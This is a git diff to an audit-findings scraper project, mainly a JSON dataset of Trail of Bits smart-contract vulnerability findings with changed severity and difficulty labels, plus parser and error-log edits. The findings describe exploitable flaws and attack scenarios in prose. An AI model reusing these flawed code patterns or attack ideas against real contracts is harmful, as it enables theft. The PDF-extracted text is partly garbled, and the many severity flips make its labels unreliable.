} Figure 10.3: The disembark function in Fraxferry.sol#L162-L178 Exploit Scenario Bob, Fraxferry's captain, calls depart with an end value greater than 2 ** 64 , which is cast to a value less than start . As a consequence, the system becomes unavailable either because the crew members called disputeBatch or because the disembark function reverts. Recommendations Short term, replace the unsafe cast operation in the depart function with a safe cast operation to ensure that the end >= start invariant holds. Long term, implement robust unit tests and fuzz tests to check that important invariants hold.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: High", + "Difficulty: High" ] }, { @@ -5077,47 +7715,127 @@ "body": "The Fraxferry contract's owner can call the jettison or jettisonGroup functions to cancel a transaction or a series of transactions, respectively. However, these functions incorrectly use the executeIndex variable to determine whether the given transaction has already been executed. As a result, it is possible to cancel an already executed transaction. The problem is that executeIndex tracks executed batches, not executed transactions. Because a batch can contain more than one transaction, the check in the _jettison function (figure 11.1) does not work correctly. function _jettison ( uint index , bool cancel ) internal { require (index>=executeIndex, \"Transaction already executed\" ); cancelled[index]=cancel; emit Cancelled(index,cancel); } function jettison ( uint index , bool cancel ) external isOwner { _jettison(index,cancel); } function jettisonGroup ( uint [] calldata indexes, bool cancel ) external isOwner { for ( uint i = 0 ; i < indexes.length; i++) { _jettison(indexes[i], cancel); } } [...] require(amount > 0, \"Amount must be positive\"); uint40 poolIndex = _poolIndexFrom(poolTokenIndex); require(poolIndex != 0, \"Cannot use 0 as pool index\"); Figure 9.2: contracts/Pools/MesonPools.sol:70-74 Moreover, even if the function allowed the withdrawal of tokens stored at poolIndex 0, a withdrawal would still not be possible. This is because the owner of poolIndex 0 is not set during initialization, and it is not possible to register a pool with index 0. function initialize(address[] memory supportedTokens) public { require(!_initialized, \"Contract instance has already been initialized\"); _initialized = true; _owner = _msgSender(); _premiumManager = _msgSender(); for (uint8 i = 0; i < supportedTokens.length; i++) { _addSupportToken(supportedTokens[i], i + 1); } } Figure 9.3: contracts/UpgradableMeson.sol:13-22 Fix Analysis This issue has been resolved. The source code now includes comments explaining that the service fee will not be withdrawable until the contract is updated.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Low" ] }, { @@ -5197,8 +7915,8 @@ "body": "The MesonHelpers contract uses the low-level call function to execute the transfer / transferFrom function of an ERC20 token. However, it does not first perform a contract existence check. Thus, if there is no contract at the token address, the low-level call will still return success. This means that if a supported token is subsequently self-destructed (which is unlikely to happen), it will be possible for a posted swap involving that token to succeed without actually depositing any tokens. 
function _unsafeDepositToken( address token, address sender, uint256 amount, bool isUCT 53 54 55 56 57 58 ) internal { 59 60 61 62 require(token != address(0), \"Token not supported\"); require(amount > 0, \"Amount must be greater than zero\"); (bool success, bytes memory data) = token.call(abi.encodeWithSelector( bytes4(0x23b872dd), // bytes4(keccak256(bytes(\"transferFrom(address,address,uint256)\"))) 63 64 65 66 sender, address(this), amount // isUCT ? amount : amount * 1e12 // need to switch to this line if deploying to BNB Chain or Conflux 67 68 )); require(success && (data.length == 0 || abi.decode(data, (bool))), \"transferFrom failed\"); 69 } Figure 10.1: contracts/util/MesonHelpers.sol:5369 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their first 23 Meson Protocol Fix Review return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 10.2: A snippet of the Solidity documentation detailing unexpected behavior related to call Fix Analysis This issue has been resolved. The low-level call is now paired with OpenZeppelins Address.isContract function, which ensures that the contract at the target address is populated as expected. This makes the deposit mechanism robust against self-destructs. 24 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { @@ -5217,8 +7935,8 @@ "body": "The Meson protocol software development kit (SDK) uses the _randomHex function to generate random salts for new swaps. This function accepts a string length as input and produces a random hexadecimal string of that length. To do that, _randomHex uses the JavaScript Math.random function to generate a 32-bit integer and then encodes the integer as a zero-padded hexadecimal string. The result is eight random hexadecimal characters, padded with zeros to the desired length. However, the function is called with an argument of 16, so half of the characters in the salt it produces will be zero. } 95 96 97 98 99 100 101 102 103 104 } 105 106 107 108 109 110 111 112 113 } private _makeFullSalt(salt?: string): string { if (salt) { if (!isHexString(salt) || salt.length > 22) { throw new Error('The given salt is invalid') } return `${salt}${this._randomHex(22 - salt.length)}` return `0x0000${this._randomHex(16)}` private _randomHex(strLength: number) { if (strLength === 0) { return '' } const max = 2 ** Math.min((strLength * 4), 32) const rnd = BigNumber.from(Math.floor(Math.random() * max)) return hexZeroPad(rnd.toHexString(), strLength / 2).replace('0x', '') Figure 12.1: packages/sdk/src/Swap.ts#95113 Furthermore, the Math.random function is not suitable for uses in which the output of the random number generator should be unpredictable. While the protocols current use of the function does not pose a security risk, future implementers and library users may assume that the function produces the requested amount of high-quality entropy. 26 Meson Protocol Fix Review Fix Analysis This issue has been partially resolved. While the _randomHex function now uses cryptographic randomness to generate random hexadecimal characters, the function continues to silently output leading zeros when more than eight characters are requested or when an odd number of characters is requested. 
To prevent future misuse of this function, we recommend having it return a uniformly random string with the exact number of characters requested. 27 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Undetermined" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -5227,8 +7945,8 @@ "body": "The primary identier of swaps in the MesonSwap contract is the encodedSwap structure. This structure does not contain the address of a swaps initiator, which is recorded, along with the poolIndex of the bonded liquidity provider (LP), as the postingValue. If a malicious actor or maximal extractable value (MEV) bot were able to front-run a users transaction and post an identical encodedSwap, the original initiators transaction would fail, and the initiators swap would not be posted. 48 function postSwap(uint256 encodedSwap, bytes32 r, bytes32 s, uint8 v, uint200 postingValue) external forInitialChain(encodedSwap) 49 50 { 51 require(_postedSwaps[encodedSwap] == 0, \"Swap already exists\"); ... Figure 13.1: contracts/Swap/MesonSwap.sol#4852 Because the Meson protocol supports only 1-to-1 stablecoin swaps, transaction front-running is unlikely to be protable. However, a bad actor could dramatically aect a specic users ability to transact within the system. Fix Analysis This issue has not been resolved. Meson acknowledged that user transactions can be blocked from execution by malicious actors. However, blocking a swap transaction would require an adversary to post a corresponding swap, and to thus burn gas and have his or her funds temporarily locked; these disincentives limit the impact of this issue. 28 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Medium" ] }, { @@ -5247,7 +7965,7 @@ "body": "Insucient input validation in the _addSupportToken function makes it possible to register the same token as supported multiple times. This does not cause a problem, because if there are duplicate entries for a token in the token list, the last one added will be the one that is used. However, it does mean that multiple indexes could point to the same token, while the token would point to only one of those indexes. function _addSupportToken(address token, uint8 index) internal { require(index != 0, \"Cannot use 0 as token index\"); _indexOfToken[token] = index; _tokenList[index] = token; 47 48 49 50 51 } Figure 3.1: contracts/utils/MesonTokens.sol Fix Analysis This issue has been resolved. The _addSupportToken function now validates that the token has not previously been registered, that the associated list index has not previously been used, and that the tokens address is not zero. The Meson team has also added tests to validate this behavior. 15 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: High" ] }, @@ -5257,8 +7975,8 @@ "body": "Several critical operations in the MesonPools contract do not emit events. As a result, it will be dicult to review the correct behavior of the contract once it has been deployed. The following operations should trigger events: MesonPools.depositAndRegister MesonPools.deposit MesonPools.withdraw MesonPools.addAuthorizedAddr MesonPools.removeAuthorizedAddr MesonPools.unlock Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior and may therefore overlook attacks or malfunctioning contracts. Fix Analysis This issue has been resolved. 
All of the functions listed in this nding now emit events, enabling Meson and protocol users to easily track all contract operations. 16 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Low" ] }, { @@ -5277,7 +7995,7 @@ "body": "For the MapleLoan contracts fundLoan method to fund a new loan, the balance of fundsAsset in the contract must be equal to the requested principal. // Amount funded and principal are as requested. amount_ = _principal = _principalRequested; // Cannot under/over fund loan, so that accounting works in context of PoolV1 require (_getUnaccountedAmount(_fundsAsset) == amount_, \"MLI:FL:WRONG_FUND_AMOUNT\" ); Figure 1.1: An excerpt of the fundLoan function ( contracts/MapleLoanInternals.sol#240244 ) An attacker could prevent a lender from funding a loan by making a small transfer of fundsAsset every time the lender tried to fund it (front-running the transaction). However, transaction fees would make the attack expensive. A similar issue exists in the Refinancer contract: If the terms of a loan were changed to increase the borrowed amount, an attacker could prevent a lender from accepting the new terms by making a small transfer of fundsAsset . The underlying call to increasePrincipal from within the acceptNewTerms function would then cause the transaction to revert. function increasePrincipal ( uint256 amount_ ) external override { require (_getUnaccountedAmount(_fundsAsset) == amount_, \"R:IP:WRONG_AMOUNT\" ); _principal += amount_; _principalRequested += amount_; _drawableFunds += amount_; emit PrincipalIncreased(amount_); 13 Maple Labs } Figure 1.2: The vulnerable method in the Refinancer contract ( contracts/Refinancer.sol#2330 ) Exploit Scenario A borrower tries to quickly increase the principal of a loan to take advantage of a short-term high-revenue opportunity. The borrower proposes new terms, and the lender tries to accept them. However, an attacker blocks the process and performs the protable operation himself. Recommendations Short term, allow the lender to withdraw funds in excess of the expected value (by calling getUnaccountedAmount(fundsAsset) ) before a loan is funded and between the proposal and acceptance of new terms. Alternatively, have fundLoan and increasePrincipal use greater-than-or-equal-to comparisons, rather than strict equality comparisons, to check whether enough tokens have been transferred to the contract; if there are excess tokens, use the same function to transfer them to the lender. Long term, avoid using exact comparisons for ether and token balances, as users can increase those balances by executing transfers, making the comparisons evaluate to false . 14 Maple Labs", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, @@ -5298,7 +8016,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Medium" ] }, { @@ -5307,7 +8025,7 @@ "body": "IERC20Like.decimal s declares uint256 as its return type, whereas the ERC20 standard species that it must return a uint8 . As a result, functions that use the IERC20Like interface interpret the values returned by decimals as uint256 values; this can cause values greater than 255 to enter the protocol, which could lead to undened behavior. If the return type were uint8 , only the last byte of the return value would be used. 
Exploit Scenario A non-standard token with a decimals function that returns values greater than 255 is integrated into the protocol. The code is not prepared to handle decimals values greater than 255. As a result of the large value, the arithmetic becomes unstable, enabling an attacker to drain funds from the protocol. Recommendations Short term, change the return type of IERC20.decimals to uint8 . Long term, ensure that all interactions with ERC20 tokens follow the standard.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, { @@ -5317,7 +8035,7 @@ "body": "Calls to ERC20Helper.transfer in the codebase are wrapped in require statements, except for the first such call in the liquidatePortion function of the Liquidator contract (figure 5.1). As such, a token transfer executed through this call can fail silently, meaning that liquidatePortion can take a user's funds without providing any collateral in return. This contravenes the expected behavior of the function and the behavior outlined in the docstring of ILiquidator.liquidatePortion (figure 5.2). function liquidatePortion ( uint256 swapAmount_ , bytes calldata data_) external override { ERC20Helper.transfer (collateralAsset, msg.sender , swapAmount_); msg.sender .call(data_); uint256 returnAmount = getExpectedAmount(swapAmount_); require (ERC20Helper.transferFrom(fundsAsset, msg.sender , destination, returnAmount), \"LIQ:LP:TRANSFER_FROM\" ); emit PortionLiquidated(swapAmount_, returnAmount); } Figure 5.1: The liquidatePortion function ( contracts/Liquidator.sol#41-51 ) * @dev Flash loan function that : * @dev 1 . Transfers a specified amount of `collateralAsset` to ` msg.sender `. * @dev 2 . Performs an arbitrary call to ` msg.sender `, to trigger logic necessary to get `fundsAsset` (e.g., AMM swap). * @dev 3 . Perfroms a `transferFrom`, taking the corresponding amount of `fundsAsset` from the user. * @dev If the required amount of `fundsAsset` is not returned in step 3 , the entire transaction reverts. * @param swapAmount_ Amount of `collateralAsset` that is to be borrowed in the flashloan. * @param data_ ABI-encoded arguments to be used in the low-level call to perform step 2 . */ Figure 5.2: Docstring of liquidatePortion ( contracts/interfaces/ILiquidator.sol#76-83 ) Exploit Scenario A loan is liquidated, and its liquidator contract has a collateral balance of 300 ether. The current ether price is 4,200 USDC. Alice wants to profit off of the liquidation by taking out a flash loan of 300 ether. Having checked that the contract holds enough collateral to cover the transaction, she calls liquidatePortion(1260000, ) in the liquidator contract. At the same time, Bob decides to buy 10 ether from the liquidator contract. Bob calls Liquidator.liquidatePortion(42000) . Because his transaction is mined first, the liquidator does not have enough collateral to complete the transfer of collateral to Alice. As a result, the liquidator receives a transfer of 1,260,000 USDC from Alice but does not provide any ether in return, leaving her with a $1,260,000 loss. Recommendations Short term, wrap ERC20Helper.transfer in a require statement to ensure that a failed transfer causes the entire transaction to revert. Long term, ensure that a failed transfer of tokens to or from a user always causes the entire transaction to revert. 
To do that, follow the recommendations outlined in TOB-MAPLE-006 and have the ERC20Helper.transfer and ERC20Helper.transferFrom functions revert on a failure. Ensure that all functions behave as expected , that their behavior remains predictable when transactions are reordered, and that the code does not contain any footguns or surprises. 20 Maple Labs", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: Low" ] }, @@ -5328,7 +8046,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -5337,7 +8055,7 @@ "body": "The ERC20Helper contract lls a purpose similar to that of OpenZeppelin's SafeERC20 contract. However, while OpenZeppelin's SafeERC20 transfer and approve functions will revert when called on an address that is not a token contract address (i.e., one with zero-length bytecode), ERC20Helper s functions will appear to silently succeed without transferring or approving any tokens. If the address of an externally owned account (EOA) is used as a token address in the protocol, all transfers to it will appear to succeed without any tokens being transferred. This will result in undened behavior. Contract existence checks are usually performed via the EXTCODESIZE opcode. Since the EXTCODESIZE opcode would precede a CALL to a token address, adding EXTCODESIZE would make the CALL a warm access. As a result, adding the EXTCODESIZE check would increase the gas cost by only a little more than 100. Assuming a high gas price of 200 gwei and a current ether price of $4,200, that equates to an additional cost of 10 cents for each call to the functions of ERC20Helper , which is a low price to pay for increased security. The following functions lack contract existence checks: ERC20Helper call in _call ProxyFactory call in _initializeInstance call in _upgradeInstance (line 66) call in _upgradeInstance (line 72) Proxied delegatecall in _migrate Proxy delegatecall in _ fallback 22 Maple Labs MapleLoanInternals delegatecall in _acceptNewTerms Exploit Scenario A token contract is destroyed. However, since all transfers of the destroyed token will succeed, all Maple protocol users can transact as though they have an unlimited balance of that token. If contract existence checks were executed before those transfers, all transfers of the destroyed token would revert. Recommendations Short term, add a contract existence check before each of the low-level calls mentioned above. Long term, add contract existence checks before all low-level CALL s, DELEGATECALL s, and STATICCALL s. These checks are inexpensive and add an important layer of defense. 23 Maple Labs", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: High", "Difficulty: High" ] }, @@ -5347,8 +8065,8 @@ "body": "A number of constructors and functions in the codebase do not revert if zero is passed in for a parameter that should not be set to zero. The following parameters are not checked for the zero value: Liquidator contract constructor() owner_ collateralAsset_ fundsAsset_ auctioneer_ destination_ setAuctioneer() auctioneer_ MapleLoan contract setBorrower() borrower_ setLender() lender_ MapleProxyFactory contract constructor() mapleGlobals_ If zero is passed in for one of those parameters, it will render the contract unusable, leaving its funds locked (and therefore eectively lost) and necessitating an expensive redeployment. 
For example, if there were a bug in the front end, MapleLoan.setBorrower could be called with address(0) , rendering the contract unusable and locking its funds in it. 24 Maple Labs The gas cost of checking a parameter for the zero value is negligible. Since the parameter is usually already on the stack, a zero check consists of a DUP opcode (3 gas) and an ISZERO opcode (3 gas). Given a high gas price of 200 gwei and an ether price of $4,200, a zero check would cost half a cent. Exploit Scenario A new version of the front end is deployed. A borrower suspects that the address currently used for his or her loan might have been compromised. As a precautionary measure, the borrower decides to transfer ownership of the loan to a new address. However, the new version of the front end contains a bug: the value of an uninitialized variable is used to construct the transaction. As a result, the borrower loses access to the loan contract, and to the collateral, forever. If zero checks had been in place, the transaction would have reverted instead. Recommendations Short term, add zero checks for the parameters mentioned above and for all other parameters for which zero is not an acceptable value. Long term, comprehensively validate all parameters. Avoid relying solely on the validation performed by front-end code, scripts, or other contracts, as a bug in any of those components could prevent it from performing that validation. Additionally, integrate Slither into the CI pipeline to automatically detect functions that lack zero checks. 25 Maple Labs", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Medium" ] }, { @@ -5357,8 +8075,18 @@ "body": "The liquidatePortion function of the Liquidator contract computes the amount of funds that will be transferred from the caller to the liquidator contract. The computation uses an asset price retrieved from an oracle. There is no guarantee that the amount paid by the caller will correspond to the current market price, as a transaction that updates the price feed could be mined before the call to liquidatePortion in the liquidator contract. EOAs that call the function cannot predict the return value of the oracle. If the caller is a contract, though, it can check the return value, with some eort. Adding an upper limit to the amount paid by the caller would enable the caller to explicitly state his or her assumptions about the execution of the contract and to avoid paying too much. It would also provide additional protection against the misreporting of oracle prices. Since such a scenario is unlikely, we set the diculty level of this nding to high. Using caller-controlled limits for the amount of a transfer is a best practice commonly employed by large DeFi protocols such as Uniswap. Exploit Scenario Alice calls liquidatePortion in the liquidator contract. Due to an oracle malfunction, the amount of her transfer to the liquidator contract is much higher than the amount she would pay for the collateral on another market. Recommendations Short term, introduce a maxReturnAmount parameter and add a require statement require(returnAmount <= maxReturnAmount) to enforce that parameter. 26 Maple Labs Long term, always allow the caller to control the amount of a transfer. This is especially important for transfer amounts that depend on factors that can change between transactions. 
Enable the caller to add a lower limit for a transfer from a contract and an upper limit for a transfer of the callers funds to a contract. 27 Maple Labs A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] + }, + { + "title": "3. callApprove does not follow approval best practices ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The AssetVault.callApprove function has undocumented behaviors and lacks the increase/decrease approval functions, which might impede third-party integrations. A well-known race condition exists in the ERC-20 approval mechanism. The race condition is enabled if a user or smart contract calls approve a second time on a spender that has already been allowed. If the spender sees the transaction containing the call before it has been mined, they can call transferFrom to transfer the previous value and then still receive authorization to transfer the new value. To mitigate this, AssetVault uses the SafeERC20.safeApprove function, which will revert if the allowance is updated from nonzero to nonzero. However, this behavior is not documented, and it might break the protocols integration with third-party contracts or o-chain components. 282 283 284 285 286 287 288 289 290 291 292 293 294 295 37 38 39 40 41 42 function callApprove( address token, address spender, uint256 amount ) external override onlyAllowedCallers onlyWithdrawDisabled nonReentrant { if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) { revert AV_NonWhitelistedApproval(token, spender); } // Do approval IERC20(token).safeApprove(spender, amount); emit Approve(msg.sender, token, spender, amount); } Figure 3.1: The callApprove function in arcade-protocol/contracts/vault/AssetVault.sol /** * @dev Deprecated. This function has issues similar to the ones found in * {IERC20-approve}, and its usage is discouraged. * * Whenever possible, use {safeIncreaseAllowance} and * {safeDecreaseAllowance} instead. 26 Arcade.xyz V3 Security Assessment */ function safeApprove( IERC20 token, address spender, uint256 value ) internal { 43 44 45 46 47 48 49 50 51 52 53 54 55 56 spender, value)); 57 } // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), \"SafeERC20: approve from non-zero to non-zero allowance\" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, Figure 3.2: The safeApprove function in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol An alternative way to mitigate the ERC-20 race condition is to use the increaseAllowance and decreaseAllowance functions to safely update allowances. These functions are widely used by the ecosystem and allow users to update approvals with less ambiguity. 
uint256 newAllowance = token.allowance(address(this), spender) + value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, } ) internal { function safeIncreaseAllowance( function safeDecreaseAllowance( IERC20 token, address spender, uint256 value 59 60 61 62 63 64 65 spender, newAllowance)); 66 67 68 69 70 71 72 73 74 75 zero\"); 76 77 abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); 78 79 uint256 newAllowance = oldAllowance - value; _callOptionalReturn(token, IERC20 token, address spender, uint256 value ) internal { unchecked { } } uint256 oldAllowance = token.allowance(address(this), spender); require(oldAllowance >= value, \"SafeERC20: decreased allowance below Figure 3.3: The safeIncreaseAllowance and safeDecreaseAllowance functions in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol 27 Arcade.xyz V3 Security Assessment Exploit Scenario Alice, the owner of an asset vault, sets up an approval of 1,000 for her external contract by calling callApprove. She later decides to update the approval amount to 1,500 and again calls callApprove. This second call reverts, which she did not expect. Recommendations Short term, take one of the following actions: Update the documentation to make it clear to users and other integrating smart contract developers that two transactions are needed to update allowances. Add two new functions in the AssetVault contract: callIncreaseAllowance and callDecreaseAllowance, which internally call SafeERC20.safeIncreaseAllowance and SafeERC20.safeDecreaseAllowance, respectively. Long term, when using external libraries/contracts, always ensure that they are being used correctly and that edge cases are explained in the documentation. 28 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] } ] \ No newline at end of file diff --git a/scrapers/dedaub_parser.py b/scrapers/dedaub_parser.py index 4d03626..196c638 100644 --- a/scrapers/dedaub_parser.py +++ b/scrapers/dedaub_parser.py @@ -196,15 +196,18 @@ def jsonify_findings(json_name): if __name__ == "__main__": # Step 1: Extract findings text from PDFs - # for contents in os.walk("../pdfs/dedaub-audits"): - # if contents[1]: - # for subdir in contents[1]: - # pdf_path = contents[0] + "/" + subdir - # for pdf_file in os.listdir(pdf_path): - # # Skip Ethereum Foundation directory, those are impact studies not audits - # # Skip DeFi Saver and Mushroom Finance directory, they have very different report structures - # if pdf_path.find("Ethereum Foundation") < 0 and pdf_path.find("DeFi Saver") < 0 and pdf_path.find("Mushrooms Finance") < 0: - # extract_finding(subdir + "/" + pdf_file) + for contents in os.walk("../pdfs/dedaub-audits"): + if contents[1]: + for subdir in contents[1]: + pdf_path = contents[0] + "/" + subdir + for pdf_file in os.listdir(pdf_path): + # Skip Ethereum Foundation directory, those are impact studies not audits + # Skip DeFi Saver and Mushroom Finance directory, they have very different report structures + if pdf_path.find("Ethereum Foundation") < 0 and pdf_path.find("DeFi Saver") < 0 and pdf_path.find("Mushrooms Finance") < 0: + try: + extract_finding(subdir + "/" + pdf_file) + except: + print("Error parsing " + pdf_file) # Step 2: Parse findings text into JSON for json_file in os.listdir("../findings_newupdate/dedaub"): @@ -212,16 +215,16 @@ def jsonify_findings(json_name): # Step 3: deduplicate findings # only keep unique findings, the file contains an array of 
findings - # with open("../results/dedaub_findings.json", "r") as f: - # findings = json.load(f) + with open("../results/dedaub_findings.json", "r") as f: + findings = json.load(f) - # unique_findings = [] - # for finding in findings: - # if finding not in unique_findings: - # unique_findings.append(finding) + unique_findings = [] + for finding in findings: + if finding not in unique_findings: + unique_findings.append(finding) # Step 4: write only unique findings to final json - # with open("../results/dedaub_findings.json", "w") as f: - # json.dump(unique_findings, f, indent=4) + with open("../results/dedaub_findings.json", "w") as f: + json.dump(unique_findings, f, indent=4) \ No newline at end of file diff --git a/scrapers/errors.txt b/scrapers/errors.txt index 9fee62c..9aeb7ee 100644 --- a/scrapers/errors.txt +++ b/scrapers/errors.txt @@ -5,3 +5,426 @@ SeaportProtocol.pdf UniswapMobileWallet-securityreview.pdf MesonProtocol.pdf 2022-10-shimacapital-ondo-securityreview.pdf +Enzyme/Enzyme Audit.pdf +Enzyme/Enzyme Audit.pdf +Enzyme/Enzyme Audit.pdf +Enzyme/Enzyme Audit.pdf +Enzyme/Enzyme Audit.pdf +LiquidCollectivePR-Spearbit-Security-Review-July.pdf +2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf +aaveprotocol.pdf +Reserve_LOA.pdf +Tezori.pdf +DFINITYCanisterSandboxFixReview.pdf +TokenCard.pdf +zlib.pdf +OPAGatekeeper.pdf +computable.pdf +2023-08-digitalocean-oidc-securityreview.pdf +qtum_loa.pdf +nucypher.pdf +etcd.pdf +SweetB.pdf +wXTZ.pdf +2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf +aaveprotocol.pdf +Reserve_LOA.pdf +Tezori.pdf +DFINITYCanisterSandboxFixReview.pdf +TokenCard.pdf +zlib.pdf +OPAGatekeeper.pdf +computable.pdf +2023-08-digitalocean-oidc-securityreview.pdf +qtum_loa.pdf +nucypher.pdf +etcd.pdf +SweetB.pdf +wXTZ.pdf +celo_bugfixes.md +parity.pdf +renvm.pdf +UniswapV3Core.pdf +PerpetualProtocolV2.pdf +argo-securityreview.pdf +ZcashWP.pdf +AlephBFT.pdf +2022-12-curl-threatmodel.pdf +SpruceID.pdf +OriginDollar.pdf +origin.pdf +aztec.pdf +Liquity.pdf +2022-12-openarchivesaveandroid-securityreview.pdf +basis.pdf +argo-threatmodel.pdf +zecwallet.pdf +ampleforth.pdf +Mobilecoin.pdf +CloudEvents.pdf +2023-02-chainport-fixreview.pdf +MobilecoinFog.pdf +MagmaWallet.pdf +chai-loa.pdf +LinuxKernelReleaseSigning.pdf +FraxFinance.pdf +ParallelFinance2FixReview.pdf +DFINITYThresholdECDSAandBtcCanistersFixReview.pdf +0x-protocol.pdf +gemini-dollar.pdf +Opyn.pdf +hermez.pdf +livepeer.pdf +compound-governance.pdf +2023-04-mysoloans-securityreview.pdf +YearnV2Vaults.pdf +dtoken.pdf +LiquityProxyContracts.pdf +Linkerd-fixreview.pdf +2021-04-balancer-balancerv2-securityreview.pdf +AnteProtocolFixReview.pdf +compound-2.pdf +SeaportProtocol.pdf +zcoin-lelantus-summary.pdf +CREAMSummary.pdf +numerai.pdf +2022-10-shimacapital-ondo-fixreview.pdf +CasperLedger.pdf +2022-12-paxos-paypal-pyusd-securityreview.pdf +compound-3.pdf +CurveDAO.pdf +2023-04-ajnalabs-securityreview.pdf +CompliFi.pdf +curve-summary.pdf +Hey.pdf +MobileCoinBFT.pdf +mc-dai.pdf +YieldProtocol.pdf +UniswapMobileWallet-fixreview.pdf +Opyn-Gamma-Protocol.pdf +WorkLock-Summary.pdf +StandardNotes.pdf +DFINITYConsensus.pdf +2022-10-GSquared-fixreview.pdf +arweave-randomx.pdf +dodo.pdf +NervosSUDT.pdf +2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf +nucypher-2.pdf +AdvancedBlockchainQ42021.pdf +rook.pdf +UniswapMobileWallet-securityreview.pdf +DFINITY.pdf +amp.pdf +golem.pdf +RSKj.pdf +BeethovenXSummary.pdf +Symbol.pdf +pantheon.pdf +2022-09-incrementprotocol-fixreview.pdf 
+voatz-threatmodel.pdf +Flexa.pdf +setprotocol.pdf +AcalaNetwork.pdf +wALGO.pdf +Zcash.pdf +hegic-summary.pdf +LedgerFilecoin.pdf +AdvancedBlockchain.pdf +MesonProtocol.pdf +Helm.pdf +ETH2DepositCLI.pdf +2022-07-beanstalk-fixreview.pdf +2022-10-openarchivesaveios-securityreview.pdf +88mph.pdf +2023-03-primitive-securityreview.pdf +2022-10-shimacapital-ondo-securityreview.pdf +thesis-summary.pdf +voatz-securityreview.pdf +sai.pdf +dexter.pdf +dapphub.pdf +paxos.pdf +2023-06-thesistsslib-securityreview.pdf +dharma-smartwallet.pdf +EIP-1283.pdf +MesonProtocolDesignReview.pdf +SecureDropWorkstation.pdf +CasperLabsHighwayProtocol.pdf +ZeroTierProtocol.pdf +2023-07-dappos-securityreview.pdf +LiquityProtocolandStabilityPoolFinalReport.pdf +BalancerCore.pdf +Zcash2.pdf +sandiskx600.pdf +2023-03-eleutherai-huggingface-safetensors-securityreview.pdf +2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf +aaveprotocol.pdf +Reserve_LOA.pdf +Tezori.pdf +DFINITYCanisterSandboxFixReview.pdf +TokenCard.pdf +zlib.pdf +OPAGatekeeper.pdf +computable.pdf +2023-08-digitalocean-oidc-securityreview.pdf +qtum_loa.pdf +nucypher.pdf +etcd.pdf +SweetB.pdf +wXTZ.pdf +celo_bugfixes.md +parity.pdf +renvm.pdf +UniswapV3Core.pdf +PerpetualProtocolV2.pdf +argo-securityreview.pdf +ZcashWP.pdf +AlephBFT.pdf +2022-12-curl-threatmodel.pdf +SpruceID.pdf +OriginDollar.pdf +origin.pdf +aztec.pdf +Liquity.pdf +2022-12-openarchivesaveandroid-securityreview.pdf +basis.pdf +argo-threatmodel.pdf +zecwallet.pdf +ampleforth.pdf +Mobilecoin.pdf +CloudEvents.pdf +2023-02-chainport-fixreview.pdf +MobilecoinFog.pdf +MagmaWallet.pdf +chai-loa.pdf +LinuxKernelReleaseSigning.pdf +FraxFinance.pdf +ParallelFinance2FixReview.pdf +DFINITYThresholdECDSAandBtcCanistersFixReview.pdf +0x-protocol.pdf +gemini-dollar.pdf +Opyn.pdf +hermez.pdf +livepeer.pdf +compound-governance.pdf +2023-04-mysoloans-securityreview.pdf +YearnV2Vaults.pdf +dtoken.pdf +LiquityProxyContracts.pdf +Linkerd-fixreview.pdf +2021-04-balancer-balancerv2-securityreview.pdf +AnteProtocolFixReview.pdf +compound-2.pdf +SeaportProtocol.pdf +zcoin-lelantus-summary.pdf +CREAMSummary.pdf +numerai.pdf +2022-10-shimacapital-ondo-fixreview.pdf +CasperLedger.pdf +2022-12-paxos-paypal-pyusd-securityreview.pdf +compound-3.pdf +CurveDAO.pdf +2023-04-ajnalabs-securityreview.pdf +CompliFi.pdf +curve-summary.pdf +Hey.pdf +MobileCoinBFT.pdf +mc-dai.pdf +YieldProtocol.pdf +UniswapMobileWallet-fixreview.pdf +Opyn-Gamma-Protocol.pdf +WorkLock-Summary.pdf +StandardNotes.pdf +DFINITYConsensus.pdf 